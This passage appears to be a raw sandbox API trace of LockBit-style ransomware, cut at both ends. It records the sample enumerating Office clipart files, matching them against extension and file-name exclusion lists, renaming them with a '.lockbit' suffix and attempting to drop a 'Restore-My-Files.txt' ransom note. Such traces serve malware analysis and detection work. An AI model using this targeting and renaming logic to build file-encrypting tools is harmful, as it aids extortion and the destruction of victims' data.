(lpString1="Restore-My-Files.txt", lpString2="J0105320.WMF") returned 1 [0138.695] lstrcmpiW (lpString1="ntldr", lpString2="J0105320.WMF") returned 1 [0138.695] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105320.WMF") returned 1 [0138.695] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105320.WMF") returned -1 [0138.695] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105320.WMF") returned -1 [0138.695] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105320.WMF") returned 1 [0138.695] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105320.WMF") returned -1 [0138.696] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.696] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF") returned=".WMF" [0138.696] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.696] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.696] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.696] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.696] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.696] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.696] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.696] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.696] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.696] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.696] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.696] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.696] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.696] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.696] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.696] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.696] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.696] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.696] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.697] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.697] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.697] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.697] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.697] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.697] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.697] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.697] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.697] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.697] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF.lockbit") returned 72 [0138.697] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105320.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0138.699] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.699] malloc (_Size=0x40068) returned 0x3df0008 [0138.699] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2020) returned 1 [0138.699] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.700] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0138.700] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.700] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.701] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0138.701] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.703] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.703] malloc (_Size=0xa6) returned 0x77d7a8 [0138.703] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.703] free (_Block=0x77d7a8) [0138.703] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.704] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.704] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.704] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56347c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1f38, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105328.WMF", cAlternateFileName="")) returned 1 [0138.704] lstrcmpiW (lpString1=".", lpString2="J0105328.WMF") returned -1 [0138.704] lstrcmpiW (lpString1="..", lpString2="J0105328.WMF") returned -1 [0138.704] PathFindExtensionW (pszPath="J0105328.WMF") returned=".WMF" [0138.704] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.704] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.704] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.704] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.704] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.704] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.704] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.704] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.704] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.704] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.704] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.704] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.704] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.704] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.704] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.704] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.704] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.704] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.705] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.705] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105328.WMF") returned 1 [0138.705] lstrcmpiW (lpString1="ntldr", lpString2="J0105328.WMF") returned 1 [0138.706] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105328.WMF") returned 1 [0138.706] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105328.WMF") returned -1 [0138.706] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105328.WMF") returned -1 [0138.706] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105328.WMF") returned 1 [0138.706] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105328.WMF") returned -1 [0138.706] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.706] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF") returned=".WMF" [0138.706] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.706] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.706] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.706] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.706] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.706] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.706] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.706] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.706] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.706] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.706] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.706] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.706] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.706] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.706] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.706] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.706] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.706] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.706] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.707] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.707] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.707] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.707] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.707] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.707] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.707] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.707] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.707] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.707] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF.lockbit") returned 72 [0138.707] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105328.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0138.708] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.708] malloc (_Size=0x40068) returned 0x1ff1e60 [0138.708] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7992) returned 1 [0138.708] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.708] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.708] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0138.708] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.709] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.709] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0138.709] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0138.715] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.715] malloc (_Size=0xa6) returned 0x77d7a8 [0138.715] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.716] free (_Block=0x77d7a8) [0138.716] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.716] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.716] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.716] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56347c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x290c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105332.WMF", cAlternateFileName="")) returned 1 [0138.716] lstrcmpiW (lpString1=".", lpString2="J0105332.WMF") returned -1 [0138.716] lstrcmpiW (lpString1="..", lpString2="J0105332.WMF") returned -1 [0138.716] PathFindExtensionW (pszPath="J0105332.WMF") returned=".WMF" [0138.716] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.716] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.716] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.717] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.717] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.718] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.718] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.718] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.718] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.718] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.718] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.718] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.718] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.718] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.718] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.718] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.718] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.718] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.718] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.718] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.718] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105332.WMF") returned 1 [0138.718] lstrcmpiW (lpString1="ntldr", lpString2="J0105332.WMF") returned 1 [0138.718] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105332.WMF") returned 1 [0138.718] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105332.WMF") returned -1 [0138.718] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105332.WMF") returned -1 [0138.718] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105332.WMF") returned 1 [0138.718] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105332.WMF") returned -1 [0138.718] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.718] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF") returned=".WMF" [0138.718] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.718] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.719] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.719] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.719] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.719] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.719] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.719] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.719] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.719] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.719] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.719] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.719] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.719] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.719] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.719] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.719] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.719] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.719] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.719] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.719] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.719] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.719] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.719] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.719] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.719] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.719] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.719] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.719] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF.lockbit") returned 72 [0138.720] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105332.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0138.720] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.720] malloc (_Size=0x40068) returned 0x3d70450 [0138.720] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=10508) returned 1 [0138.720] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.721] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0138.721] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.721] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.721] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0138.721] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0138.725] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.725] malloc (_Size=0xa6) returned 0x77d7a8 [0138.725] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.726] free (_Block=0x77d7a8) [0138.726] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.726] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.726] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.726] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56347c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, 